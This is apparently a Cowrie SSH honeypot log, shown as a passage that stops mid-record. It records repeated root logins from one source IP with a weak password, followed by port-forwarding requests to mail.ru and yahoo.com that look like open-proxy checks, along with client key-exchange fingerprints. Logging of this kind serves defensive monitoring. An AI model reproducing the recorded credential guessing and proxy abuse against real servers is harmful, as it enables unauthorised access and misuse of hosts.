{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.966105Z","src_ip":"77.83.207.83","session":"5767155fa457"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.016938Z","src_ip":"77.83.207.83","session":"5767155fa457"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38570,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b19619092af","protocol":"ssh","message":"New connection: 212.227.235.229:38570 (1.2.3.4:22) [session: 3b19619092af]","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.059725Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44961,"dst_ip":"1.2.3.4","dst_port":22,"session":"30c1c48da927","protocol":"ssh","message":"New connection: 77.83.207.83:44961 (1.2.3.4:22) [session: 30c1c48da927]","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.065401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.066204Z","src_ip":"77.83.207.83","session":"30c1c48da927"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.115936Z","src_ip":"77.83.207.83","session":"30c1c48da927"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.363772Z","src_ip":"77.83.207.83","session":"30c1c48da927"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24456,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24456","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.414394Z","session":"30c1c48da927"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.464225Z","src_ip":"77.83.207.83","session":"30c1c48da927"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":5644,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:5644","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.604193Z","session":"30c1c48da927"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.654855Z","src_ip":"77.83.207.83","session":"30c1c48da927"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":15277,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:15277","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.796014Z","session":"30c1c48da927"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.845765Z","src_ip":"77.83.207.83","session":"30c1c48da927"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.894980Z","src_ip":"212.227.235.229","session":"3b19619092af"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.895854Z","src_ip":"212.227.235.229","session":"3b19619092af"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.897827Z","src_ip":"77.83.207.83","session":"30c1c48da927"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45058,"dst_ip":"1.2.3.4","dst_port":22,"session":"de0dc691fe76","protocol":"ssh","message":"New connection: 77.83.207.83:45058 (1.2.3.4:22) [session: de0dc691fe76]","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.946543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.947237Z","src_ip":"77.83.207.83","session":"de0dc691fe76"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:49.998964Z","src_ip":"77.83.207.83","session":"de0dc691fe76"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.252936Z","src_ip":"77.83.207.83","session":"de0dc691fe76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13795,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13795","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.305159Z","session":"de0dc691fe76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.356242Z","src_ip":"77.83.207.83","session":"de0dc691fe76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":7689,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7689","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.501221Z","session":"de0dc691fe76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.552274Z","src_ip":"77.83.207.83","session":"de0dc691fe76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":16947,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16947","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.697234Z","session":"de0dc691fe76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.748450Z","src_ip":"77.83.207.83","session":"de0dc691fe76"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.800234Z","src_ip":"77.83.207.83","session":"de0dc691fe76"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45126,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6afce121014","protocol":"ssh","message":"New connection: 77.83.207.83:45126 (1.2.3.4:22) [session: a6afce121014]","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.849586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.850464Z","src_ip":"77.83.207.83","session":"a6afce121014"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:50.901150Z","src_ip":"77.83.207.83","session":"a6afce121014"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.152621Z","src_ip":"77.83.207.83","session":"a6afce121014"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14712,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14712","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.203869Z","session":"a6afce121014"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.254369Z","src_ip":"77.83.207.83","session":"a6afce121014"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4054,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4054","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.396929Z","session":"a6afce121014"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.447544Z","src_ip":"77.83.207.83","session":"a6afce121014"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":28114,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28114","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.588836Z","session":"a6afce121014"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.639243Z","src_ip":"77.83.207.83","session":"a6afce121014"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.690504Z","src_ip":"77.83.207.83","session":"a6afce121014"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45215,"dst_ip":"1.2.3.4","dst_port":22,"session":"52451199e170","protocol":"ssh","message":"New connection: 77.83.207.83:45215 (1.2.3.4:22) [session: 52451199e170]","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.739059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.749413Z","src_ip":"77.83.207.83","session":"52451199e170"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:51.790833Z","src_ip":"77.83.207.83","session":"52451199e170"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.040821Z","src_ip":"77.83.207.83","session":"52451199e170"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":646,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:646","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.092103Z","session":"52451199e170"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.142247Z","src_ip":"77.83.207.83","session":"52451199e170"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27328,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27328","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.284415Z","session":"52451199e170"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.334527Z","src_ip":"77.83.207.83","session":"52451199e170"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":26193,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26193","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.476441Z","session":"52451199e170"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.526623Z","src_ip":"77.83.207.83","session":"52451199e170"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.577780Z","src_ip":"77.83.207.83","session":"52451199e170"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45306,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7f3e7cf4612","protocol":"ssh","message":"New connection: 77.83.207.83:45306 (1.2.3.4:22) [session: e7f3e7cf4612]","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.627382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.636669Z","src_ip":"77.83.207.83","session":"e7f3e7cf4612"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-in